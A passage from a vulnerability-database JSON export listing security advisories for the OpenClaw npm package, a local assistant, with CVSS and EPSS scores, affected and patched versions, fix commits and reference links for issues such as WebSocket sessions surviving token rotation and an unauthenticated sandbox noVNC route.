ements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/
U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rqp8-q22p-5j9q"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35635","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35635"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-webhook-path-route-replacement-vulnerability-in-synology-chat","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-webhook-path-route-replacement-vulnerability-in-synology-chat"},{"reference_url":"https://github.com/advisories/GHSA-g8mc-c5f2-mqg7","reference_id":"GHSA-g8mc-c5f2-mqg7","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-g8mc-c5f2-mqg7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VC
ID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VC
ID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VC
ID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VC
ID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VC
ID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["GHSA-g8mc-c5f2-mqg7"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-nszj-2u6y-xqcb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89492?format=json","vulnerability_id":"VCID-ntwt-jkgr-sffu","summary":"OpenClaw: Existing WS sessions survive shared gateway token rotation\n## Impact\n\nExisting WS sessions survive shared gateway token rotation.\n\nRotating the shared gateway token did not disconnect existing shared-token WebSocket sessions.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. 
The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @kexinoh of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42421","reference_id":"","reference_type":"","scores":[{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10417","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10395","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10436","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42421"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5h3f-885m-v22w","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T
12:15:14Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5h3f-885m-v22w"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42421","reference_id":"CVE-2026-42421","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42421"},{"reference_url":"https://github.com/advisories/GHSA-5h3f-885m-v22w","reference_id":"GHSA-5h3f-885m-v22w","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5h3f-885m-v22w"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-websocket-session-persistence-via-shared-gateway-token-rotation","reference_id":"openclaw-websocket-session-persistence-via-shared-gateway-token-rotation","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:15:14Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-websocket-session-persistence-via-shared-gateway-token-rotation"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability"
:"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-42421","GHSA-5h3f-885m-v22w
"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ntwt-jkgr-sffu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89684?format=json","vulnerability_id":"VCID-nv6g-7gs9-pfan","summary":"OpenClaw: Sandbox noVNC helper route exposed interactive browser session credentials\n## Summary\n\nSandbox noVNC helper route exposed interactive browser session credentials.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `>= 2026.2.21 < 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nThe sandbox noVNC helper route could be reached without the intended bridge authentication, exposing an interactive browser session surface.\n\n## Technical Details\n\nThe fix gates the sandbox noVNC helper route behind bridge authentication.\n\n## Fix\n\nThe issue was fixed in #63882. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `8dfbf3268bd224b7377d1ecca77a445100746085`\n- PR: #63882\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. 
The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/8dfbf3268bd224b7377d1ecca77a445100746085","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/8dfbf3268bd224b7377d1ecca77a445100746085"},{"reference_url":"https://github.com/openclaw/openclaw/pull/63882","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/63882"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-92jp-89mq-4374","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-92jp-89mq-4374"},{"reference_url":"https://github.com/advisories/GHSA-92jp-89mq-4374","reference_id":"GHSA-92jp-89mq-4374","refe
rence_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-92jp-89mq-4374"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109896?format=json","purl":"pkg:npm/openclaw@2026.4.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6cfj-zugb-7uhq"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hphn-8fnj-qkh2"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-q3a2-qk5j-1yat"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VC
ID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"}],"aliases":["GHSA-92jp-89mq-4374"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-nv6g-7gs9-pfan"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89754?format=json","vulnerability_id":"VCID-nw4r-wjgs-8qc1","summary":"OpenClaw: /allowlist omits owner-only enforcement for cross-channel allowlist writes\n## Impact\n\n/allowlist omits owner-only enforcement for cross-channel allowlist writes.\n\nAn authorized non-owner sender could attempt allowlist writes against a different channel.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected 